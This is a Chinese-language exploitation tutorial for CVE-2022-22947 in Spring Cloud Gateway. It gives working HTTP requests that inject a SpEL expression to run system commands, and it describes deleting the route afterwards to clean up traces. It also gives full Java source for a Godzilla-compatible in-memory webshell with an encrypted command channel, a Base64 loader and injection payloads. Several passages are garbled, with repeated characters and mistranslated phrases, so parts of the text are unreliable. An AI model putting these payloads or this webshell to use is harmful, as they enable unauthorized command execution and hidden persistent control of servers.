Spring Cloud Gateway 内存马注入

漏洞简介

Spring Cloud Gateway 是基于Spring Framework 和 Spring Boot 构建的API 网关，它早在为微服务架构提供一种简单、有效、通用的API 由管理方式
以下版本的Spring Cloud Gateway 存在SPEL表格2表格2表格2表格-22947，可导致未授权远程命令执行漏洞

• 漏洞信息：CVE-2022-22947
• 使用版本：
  • 春季云网关 3.1.x < 3.1.1
  • 春季云网关 3.0.x < 3.0.7
  • Spring Cloud Gateway 其他已经不再更新的版本

漏洞复现

• 发送恶意请求，创建路径由及编写SpEL表达式
  • id段落指定新路由名称，必须唯一一
  • filters字段给这条路由指定若干过滤器，过滤器用于对请求和响应进行修改
    • name字段指定要添加的过滤器，这里添加了一个AddResponseHeader过滤器，用于gateway给客户返回响应之前添加一个响应头
    • args.name字段指定要添加的响应头
    • args.valuespel表达式的的这里。。。这里的值值值执行执行，whoami whoami命令命令命令命令。。注意需要将将将不能以 r 或 n 结尾”
    • uri字段指定将客户端请求转发到http://example.com

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

• 刷新路由，此时将触发并控制行SpEL表达式。
  • 需要注意的是，请申请体中需要空一行，否则发送后会一直等待，下同

POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

• 查看执行结果

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

• 最后可以删除所添加的路由，进行痕迹清理

DELETE /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close

• 最后刷新下路由

POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

漏洞修复

哥斯拉内存马

环境

• 创建Maven项目，引入依赖

<dependencies>
  <dependency>
    <groupId>org.springframework.cloud</groupId>
    <artifactId>spring-cloud-starter-gateway</artifactId>
    <version>3.0.6</version>
  </dependency>
</dependencies>

构造

这里使用GMemShell.java哥斯拉内存马

• 构造内存马，设置变量pass及key，其他doInject方法传入的path参数为木马路径
  • 这里key是明文testpwd的MD5值前16位，echo -n "testpwd" | md5 | cut -c 1-16

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.reactive.result.method.RequestMappingInfo;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

public class GMemShell {
  public static Map<String, Object> store = new HashMap<>();
  public static String pass = "test", md5, key = "342df5b036b2f281";
  
  public static String doInject(Object obj, String path) {
    String msg;
    try {
      md5 = md5(pass + key);
      Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
      registerHandlerMethod.setAccessible(true);
      Method executeCommand = GMemShell.class.getDeclaredMethod("cmd", ServerWebExchange.class);
      RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build();
      registerHandlerMethod.invoke(obj, new GMemShell(), executeCommand, requestMappingInfo);
      msg = "ok";
    } catch (Exception e) {
      e.printStackTrace();
      msg = "error";
    }
    return msg;
  }
  
  
  private static Class defineClass(byte[] classbytes) throws Exception {
    URLClassLoader urlClassLoader = new URLClassLoader(new URL[0], Thread.currentThread().getContextClassLoader());
    Method method = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
    method.setAccessible(true);
    return (Class) method.invoke(urlClassLoader, classbytes, 0, classbytes.length);
  }
  
  public byte[] x(byte[] s, boolean m) {
    try {
      javax.crypto.Cipher c = javax.crypto.Cipher.getInstance("AES");
      c.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(key.getBytes(), "AES"));
      return c.doFinal(s);
    } catch (Exception e) {
      return null;
    }
  }
  
  public static String md5(String s) {
    String ret = null;
    try {
      java.security.MessageDigest m;
      m = java.security.MessageDigest.getInstance("MD5");
      m.update(s.getBytes(), 0, s.length());
      ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
    } catch (Exception e) {
    }
    return ret;
  }
  
  public static String base64Encode(byte[] bs) throws Exception {
    Class base64;
    String value = null;
    try {
      base64 = Class.forName("java.util.Base64");
      Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
      value = (String) Encoder.getClass().getMethod("encodeToString", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
    } catch (Exception e) {
      try {
        base64 = Class.forName("sun.misc.BASE64Encoder");
        Object Encoder = base64.newInstance();
        value = (String) Encoder.getClass().getMethod("encode", new Class[]{byte[].class}).invoke(Encoder, new Object[]{bs});
      } catch (Exception e2) {
      }
    }
    return value;
  }
  
  public static byte[] base64Decode(String bs) throws Exception {
    Class base64;
    byte[] value = null;
    try {
      base64 = Class.forName("java.util.Base64");
      Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
      value = (byte[]) decoder.getClass().getMethod("decode", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
    } catch (Exception e) {
      try {
        base64 = Class.forName("sun.misc.BASE64Decoder");
        Object decoder = base64.newInstance();
        value = (byte[]) decoder.getClass().getMethod("decodeBuffer", new Class[]{String.class}).invoke(decoder, new Object[]{bs});
      } catch (Exception e2) {
      }
    }
    return value;
  }
  
  @PostMapping("/cmd")
  public synchronized ResponseEntity cmd(
    ServerWebExchange pdata) {
    try {
      Object bufferStream = pdata.getFormData().flatMap(c -> {
        StringBuilder result = new StringBuilder();
        try {
          String id = c.getFirst(pass);
          byte[] data = x(base64Decode(id), false);
          if (store.get("payload") == null) {
            store.put("payload", defineClass(data));
          } else {
            store.put("parameters", data);
            java.io.ByteArrayOutputStream arrOut = new java.io.ByteArrayOutputStream();
            Object f = ((Class) store.get("payload")).newInstance();
            f.equals(arrOut);
            f.equals(data);
            result.append(md5.substring(0, 16));
            f.toString();
            result.append(base64Encode(x(arrOut.toByteArray(), true)));
            result.append(md5.substring(16));
          }
        } catch (Exception ex) {
          result.append(ex.getMessage());
        }
        return Mono.just(result.toString());
      });
      return new ResponseEntity(bufferStream, HttpStatus.OK);
    } catch (Exception ex) {
      return new ResponseEntity(ex.getMessage(), HttpStatus.OK);
    }
  }
}

• 最后使用Maven进行编译，得到GMemShell.class

$ mvn compile

• 编写加载器，加载该类文件并转换为Base64编码

import java.io.ByteArrayOutputStream;
import java.io.FileInputStream;
import java.util.Base64;

public class LoaderClass {
  public static byte[] load(String path) {
    FileInputStream fis = null;
    ByteArrayOutputStream baos = null;
    
    try {
      fis = new FileInputStream(path);
      baos = new ByteArrayOutputStream();
      byte[] buffer = new byte[1024];
      int len = -1;
      while ((len = fis.read(buffer)) != -1) {
        baos.write(buffer, 0, len);
        baos.flush();
      }
      return baos.toByteArray();
    }
    catch (Exception e) {
      e.printStackTrace();
    }
    finally {
      if (fis != null) {
        try { fis.close(); }
        catch (Exception e) { e.printStackTrace(); }
      }
      if (baos != null) {
        try { baos.close(); }
        catch (Exception e) { e.printStackTrace(); }
      }
    }
    return null;
  }
  
  public static void main(String[] args) {
    byte[] code = LoaderClass.load("target/classes/GMemShell.class");
    String temp = Base64.getEncoder().encodeToString(code);
    System.out.println(temp);
  }
}

注入

此处的使用了c0ny1师傅对默认Payload进行优化后的高可用Payload

这里需要向这个 SpEL 表示形式传入前面编写代码后的 Base64 字符串以及访问路径由，如/gmem

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '</路由>')}

• 创路由

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 10770

{
  "id": "hacktest",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/gmem')}"
    }
  }],
  "uri": "http://example.com"
}

• 刷新路由

POST /actuator/gateway/refresh HTTP/1.1
Host: <IP:Port>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

• 使用浏览器访问发现路径由已经打进去了

• 使用哥斯拉进入连接
  • URL为Payload中注入的path
  • 密码为前面设置的pass，密码为key明文

注入2

魔改添加自定义

pass和

key功能，这样只需要编译一次Class并生成对应的Base64编译码，每次使用时只需要输入不同的参数即驳斥可，而不用

因为在前面GMemShell.java这个文件中，pass/key是全局静态变量，所以不能像path这样直接向doInject方法传递参，所以一开始的想法是从SpEL 表达式输入

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '/路由')}

从org.springframework.cglib.core.ReflectUtils这个类可以看到，上面的表达式中向这个类中的defineClass方法传入了3个参数：className类名、字符串数组byte[]、loader类加载器，找不到可以利用的点

pass（然后key_ doInject_ passKey_ keyStr_ keyStr_调用Spring中的DigestUtils类，所以还需要引入该类。

import org.springframework.http.HttpStatus;
import org.springframework.http.ResponseEntity;
import org.springframework.util.DigestUtils;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.reactive.result.method.RequestMappingInfo;
import org.springframework.web.server.ServerWebExchange;
import reactor.core.publisher.Mono;

import java.lang.reflect.Method;
import java.net.URL;
import java.net.URLClassLoader;
import java.util.HashMap;
import java.util.Map;

public class GMemShell {
  public static Map<String, Object> store = new HashMap<>();
  
  public static String pass, md5, key;
  
  public static String doInject(Object obj, String path, String passStr, String keyStr) {
    String msg;
    
    pass = passStr;
    key = DigestUtils.md5DigestAsHex(keyStr.getBytes()).substring(0, 16);
    
    try {
      md5 = md5(pass + key);
      Method registerHandlerMethod = obj.getClass().getDeclaredMethod("registerHandlerMethod", Object.class, Method.class, RequestMappingInfo.class);
      registerHandlerMethod.setAccessible(true);
      Method executeCommand = GMemShell.class.getDeclaredMethod("cmd", ServerWebExchange.class);
      RequestMappingInfo requestMappingInfo = RequestMappingInfo.paths(path).build();
      registerHandlerMethod.invoke(obj, new GMemShell(), executeCommand, requestMappingInfo);
      msg = "ok";
    } catch (Exception e) {
      e.printStackTrace();
      msg = "error";
    }
    return msg;
  }
  // ...
}

• 同样地，SpEl表达式也需要稻微修改下，添加接收密码和密匙参数

#{T(org.springframework.cglib.core.ReflectUtils).defineClass('GMemShell',T(org.springframework.util.Base64Utils).decodeFromString('<Base64字符串>'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping, '</路由>','<密码>','<密钥>')}